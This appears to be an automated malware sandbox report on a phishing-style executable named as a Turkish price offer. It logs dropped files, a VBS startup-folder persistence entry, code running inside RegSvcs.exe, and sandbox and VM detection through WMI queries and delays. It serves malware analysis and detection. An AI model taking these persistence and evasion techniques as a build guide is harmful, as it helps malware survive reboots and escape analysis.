Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_03164782 push ds; retf	11_2_03164797
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_031639F0 pushad ; iretd	11_2_031639F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_03164842 push edx; iretd	11_2_03164843

Source: 7.2.RegSvcs.exe.3b46458.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'OfMVLvGi4aA8w', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 7.2.RegSvcs.exe.3b93d90.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'OfMVLvGi4aA8w', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 7.2.RegSvcs.exe.5240000.8.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'OfMVLvGi4aA8w', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 7.2.RegSvcs.exe.2ae0ee8.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'OfMVLvGi4aA8w', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 7.2.RegSvcs.exe.27503c6.1.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'OfMVLvGi4aA8w', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe

File created: C:\Users\user\AppData\Local\directory\name.exe

Jump to dropped file

Boot Survival

Drops VBS files to the startup folder

Source: C:\Users\user\AppData\Local\directory\name.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs

Jump to dropped file

Source: C:\Users\user\AppData\Local\directory\name.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs

Jump to behavior

Source: C:\Users\user\AppData\Local\directory\name.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs

Jump to behavior

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe	Code function: 0_2_0099F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	0_2_0099F98E
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe	Code function: 0_2_00A11C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	0_2_00A11C41
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_00FCF98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	6_2_00FCF98E
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_01041C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	6_2_01041C41

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found API chain indicative of sandbox detection

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe	Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep			graph_0-98910
Source: C:\Users\user\AppData\Local\directory\name.exe	Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 7_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,

7_2_004019F0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 1917	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 7920	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 8816	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 1046	Jump to behavior

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe	API coverage: 4.1 %
Source: C:\Users\user\AppData\Local\directory\name.exe	API coverage: 4.2 %

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe	Code function: 0_2_009EDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	0_2_009EDBBE
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe	Code function: 0_2_009BC2A2 FindFirstFileExW,	0_2_009BC2A2
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe	Code function: 0_2_009F68EE FindFirstFileW,FindClose,	0_2_009F68EE
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe	Code function: 0_2_009F698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	0_2_009F698F
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe	Code function: 0_2_009ED076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_009ED076
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe	Code function: 0_2_009ED3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_009ED3A9
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe	Code function: 0_2_009F9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_009F9642
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe	Code function: 0_2_009F979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_009F979D
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe	Code function: 0_2_009F9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_009F9B2B
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe	Code function: 0_2_009F5C97 FindFirstFileW,FindNextFileW,FindClose,	0_2_009F5C97
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_0101DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	6_2_0101DBBE
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_00FEC2A2 FindFirstFileExW,	6_2_00FEC2A2
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_0102698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	6_2_0102698F
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_010268EE FindFirstFileW,FindClose,	6_2_010268EE
